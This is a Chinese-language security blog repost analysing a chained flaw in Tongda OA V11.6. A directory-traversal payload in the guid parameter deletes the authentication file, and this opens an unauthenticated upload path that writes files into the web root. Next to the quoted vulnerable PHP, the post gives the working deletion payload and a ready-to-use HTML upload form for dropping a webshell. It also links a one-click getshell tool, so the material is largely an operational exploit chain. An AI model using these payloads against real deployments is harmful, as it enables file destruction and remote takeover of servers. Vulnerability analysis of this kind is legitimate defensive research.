记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

通达OA任意文件删除&文件上传RCE分析(2020年hw 8月0day)

2020-10-29 12:53

影响范围

通达OA V11.6

漏洞简介

通过任意文件漏洞删除上传点包含的身份验证文件,从而造成未授权访问实现任意文件上传

漏洞分析

任意文件删除

漏洞触发点位于module/appbuilder/assets/print.php

$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";
$s_tmp .= "/" . $_GET["guid"];

if (file_exists($s_tmp)) {
$arr_data = unserialize(file_get_contents($s_tmp));
unlink($s_tmp);
$s_user = $arr_data["user"];
}
else {
echo "未知参数";
exit();
}

传入参数guid通过../进行目录穿越实现任意文件删除

payload:?guid=../../../webroot/inc/auth.inc.php

未授权访问任意文件上传

漏洞触发点位于general/data_center/utils/upload.php

第三行有个身份验证

include_once "inc/auth.inc.php";

我们已经通过任意文件删除漏洞将其删除,然后就进入上传点

部分上传代码如下

if ($action == "upload") {
if ($filetype == "xls") {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/templates/";

if (!is_dir(MYOA_ATTACH_PATH . "/data_center/templates")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}

mkdir(MYOA_ATTACH_PATH . "/data_center/templates");
}

if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $_FILES["FILE1"]["name"])) {
}
}
else if ($filetype == "img") {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/images/";

if (!is_dir(MYOA_ATTACH_PATH . "/data_center/images")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}

mkdir(MYOA_ATTACH_PATH . "/data_center/images");
}

$s_n = $_FILES["FILE1"]["name"];

if ($s_n[0] != "{") {
$p = strrpos($s_n, ".");
$s_n = CreateId() . substr($s_n, $p);
}

if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
else {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/attachment/";

if (!is_dir(MYOA_ATTACH_PATH . "/data_center/attachment")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}

mkdir(MYOA_ATTACH_PATH . "/data_center/attachment");
}

if (isset($from_rep)) {
if (($from_rep != "") && ($from_rep[0] == "{")) {
$repkid = GetRepKIDBySendId($from_rep);

if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
}
}
}
else {
$arr = explode(",", $from_rep);

for ($i = 0; $i < count($arr); $i++) {
$p = strpos($arr[$i], ".");
$repno = substr($arr[$i], 0, $p);
$repkid = GetRepKIDByNo($repno);

if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
break;
}
}
}
}
}
else {
$s_n = $_FILES["FILE1"]["name"];

if ($s_n[0] != "{") {
$s_n = $repkid . "_" . $s_n;
}

if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
}

@unlink($_FILES["FILE1"]);
}

这串代码首先得满足$action的值等于upload,然后便是根据不同的上传类型进行不同的操作,这里如果上传类型是xls或img时,上传的目录内容是不允许访问的,会403。所以我们选择最后一种上传方法,这个时候传入$filetype为其它值就行。

这个时候我们不传入$from_rep就会进入else里面,代码如下

$s_n = $_FILES["FILE1"]["name"];

if ($s_n[0] != "{") {
$s_n = $repkid . "_" . $s_n;
}

if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}

可以看到传的文件名为FILE1,可以看到最终的上传路径是$repkid拼接在前,所以我们往$repkid传入../就可以实现上传到任意目录,比如网站根目录

祭出祖传html上传表单

<form action="http://192.168.117.131:8888/general/data_center/utils/upload.php" method="post"  enctype="multipart/form-data">
<input type="text"name='filetype' value ='ghtwf01'></input>
<input type="text"name='action' value ='upload'></input>
<input type="text"name='repkid' value ='../../../'></input>
<input type="file" name="FILE1"></input>
<input type="submit" ></input>
</body>
</form>

一键getshell

https://github.com/ghtwf01/tdv11.6_rce


知识来源: xz.aliyun.com/t/8430

阅读:79256 | 评论:0 | 标签:0day

想收藏或者和大家分享这篇好文章→复制链接地址

“通达OA任意文件删除&文件上传RCE分析(2020年hw 8月0day)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持·广告位💖

标签云